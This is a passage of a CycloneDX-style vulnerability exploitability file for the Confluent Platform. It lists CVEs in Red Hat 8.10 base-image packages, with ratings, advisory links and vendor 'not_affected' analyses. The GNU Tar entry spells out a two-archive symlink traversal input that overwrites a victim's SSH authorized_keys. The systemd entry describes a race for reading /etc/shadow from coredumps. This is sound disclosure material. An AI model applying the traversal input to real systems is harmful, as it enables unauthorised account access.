        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-4516",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        416
      ],
      "description": "There is an issue in CPython when using `bytes.decode(\"unicode_escape\", error=\"ignore|replace\")`. If you are not using the \"unicode_escape\" encoding or an error handler your usage is not affected. To work-around this issue you may stop using the error= handler and instead wrap the bytes.decode() call in a try-except catching the DecodeError.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-4516"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/05/16/4"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/05/19/1"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:23530"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-4516"
        },
        {
          "url": "https://bugzilla.redhat.com/2294682"
        },
        {
          "url": "https://bugzilla.redhat.com/2321440"
        },
        {
          "url": "https://bugzilla.redhat.com/2325776"
        },
        {
          "url": "https://bugzilla.redhat.com/2343237"
        },
        {
          "url": "https://bugzilla.redhat.com/2366509"
        },
        {
          "url": "https://bugzilla.redhat.com/2370010"
        },
        {
          "url": "https://bugzilla.redhat.com/2370014"
        },
        {
          "url": "https://bugzilla.redhat.com/2370016"
        },
        {
          "url": "https://bugzilla.redhat.com/2372426"
        },
        {
          "url": "https://bugzilla.redhat.com/2373234"
        },
        {
          "url": "https://bugzilla.redhat.com/2402342"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294682"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2321440"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2325776"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2343237"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2366509"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370010"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370014"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370016"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2372426"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2373234"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402342"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11168"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5642"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9287"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0938"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4138"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4330"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4435"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4516"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4517"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6069"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8291"
        },
        {
          "url": "https://errata.almalinux.org/8/ALSA-2025-23530.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:23530"
        },
        {
          "url": "https://github.com/python/cpython/commit/4398b788ffc1f954a2c552da285477d42a571292"
        },
        {
          "url": "https://github.com/python/cpython/commit/5646648678295a44aa82636c6e92826651baf33a"
        },
        {
          "url": "https://github.com/python/cpython/commit/6279eb8c076d89d3739a6edb393e43c7929b429d"
        },
        {
          "url": "https://github.com/python/cpython/commit/69b4387f78f413e8c47572a85b3478c47eba8142"
        },
        {
          "url": "https://github.com/python/cpython/commit/73b3040f592436385007918887b7e2132aa8431f"
        },
        {
          "url": "https://github.com/python/cpython/commit/8d35fd1b34935221aff23a1ab69a429dd156be77"
        },
        {
          "url": "https://github.com/python/cpython/commit/9f69a58623bd01349a18ba0c7a9cb1dad6a51e8e"
        },
        {
          "url": "https://github.com/python/cpython/commit/9f69a58623bd01349a18ba0c7a9cb1dad6a51e8e%20%28main%29"
        },
        {
          "url": "https://github.com/python/cpython/commit/ab9893c40609935e0d40a6d2a7307ea51aec598b"
        },
        {
          "url": "https://github.com/python/cpython/issues/133767"
        },
        {
          "url": "https://github.com/python/cpython/pull/129648"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-4516.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-23530.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/L75IPBBTSCYEF56I2M4KIW353BB3AY74/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4516"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7570-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-4516"
        }
      ],
      "published": "2025-05-15T14:15:31+00:00",
      "updated": "2026-07-31T14:16:44+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-45582",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        24
      ],
      "description": "GNU Tar through 1.35 allows file overwrite via directory traversal in crafted TAR archives, with a certain two-step process. First, the victim must extract an archive that contains a ../ symlink to a critical directory. Second, the victim must extract an archive that contains a critical file, specified via a relative pathname that begins with the symlink name and ends with that critical file's name. Here, the extraction follows the symlink and overwrites the critical file. This bypasses the protection mechanism of \"Member name contains '..'\" that would occur for a single TAR archive that attempted to specify the critical file via a ../ approach. For example, the first archive can contain \"x -> ../../../../../home/victim/.ssh\" and the second archive can contain x/authorized_keys. This can affect server applications that automatically extract any number of user-supplied TAR archives, and were relying on the blocking of traversal. This can also affect software installation processes in which \"tar xf\" is run more than once (e.g., when installing a package can automatically install two dependencies that are set up as untrusted tarballs instead of official packages). NOTE: the official GNU Tar manual has an otherwise-empty directory for each \"tar xf\" in its Security Rules of Thumb; however, third-party advice leads users to run \"tar xf\" more than once into the same directory.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-45582"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/11/01/6"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:0067"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-45582"
        },
        {
          "url": "https://bugzilla.redhat.com/2379592"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2379592"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-45582"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-0067.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:0067"
        },
        {
          "url": "https://github.com/i900008/vulndb/blob/main/Gnu_tar_vuln.md"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-45582.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-0067.html"
        },
        {
          "url": "https://lists.gnu.org/archive/html/bug-tar/2025-08/msg00012.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-45582"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8510-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-45582"
        },
        {
          "url": "https://www.gnu.org/software/tar/"
        },
        {
          "url": "https://www.gnu.org/software/tar/manual/html_node/Integrity.html"
        },
        {
          "url": "https://www.gnu.org/software/tar/manual/html_node/Integrity.html#Integrity"
        },
        {
          "url": "https://www.gnu.org/software/tar/manual/html_node/Security-rules-of-thumb.html"
        }
      ],
      "published": "2025-07-11T17:15:37+00:00",
      "updated": "2026-06-17T09:25:34+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2",
          "versions": [
            {
              "version": "2:1.30-11.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2025-4598",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        364
      ],
      "description": "A vulnerability was found in systemd-coredump. This flaw allows an attacker to force a SUID process to crash and replace it with a non-SUID binary to access the original's privileged process coredump, allowing the attacker to read sensitive data, such as /etc/shadow content, loaded by the original process.\n\nA SUID binary or process has a special type of permission, which allows the process to run with the file owner's permissions, regardless of the user executing the binary. This allows the process to access more restricted data than unprivileged users or processes would be able to. An attacker can leverage this flaw by forcing a SUID process to crash and force the Linux kernel to recycle the process PID before systemd-coredump can analyze the /proc/pid/auxv file. If the attacker wins the race condition, they gain access to the original's SUID process coredump file. They can read sensitive content loaded into memory by the original binary, affecting data confidentiality.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-4598"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Jun/9"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/06/05/1"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/06/05/3"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/08/18/3"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:22660"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:22868"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:23227"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:23234"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:0414"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:1652"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18153"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-4598"
        },
        {
          "url": "https://blogs.oracle.com/linux/post/analysis-of-cve-2025-4598"
        },
        {
          "url": "https://bugzilla.redhat.com/2369242"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2369242"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://ciq.com/blog/the-real-danger-of-systemd-coredump-cve-2025-4598/"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4598"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2025-22660.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:22660"
        },
        {
          "url": "https://git.kernel.org/linus/b5325b2a270fcaf7b2a9a0f23d422ca8a5a8bdea"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/0c49e0049b7665bb7769a13ef346fef92e1ad4d6%20%28main%29"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/13902e025321242b1d95c6d8b4e482b37f58cdef%20%28main%29"
        },
        {
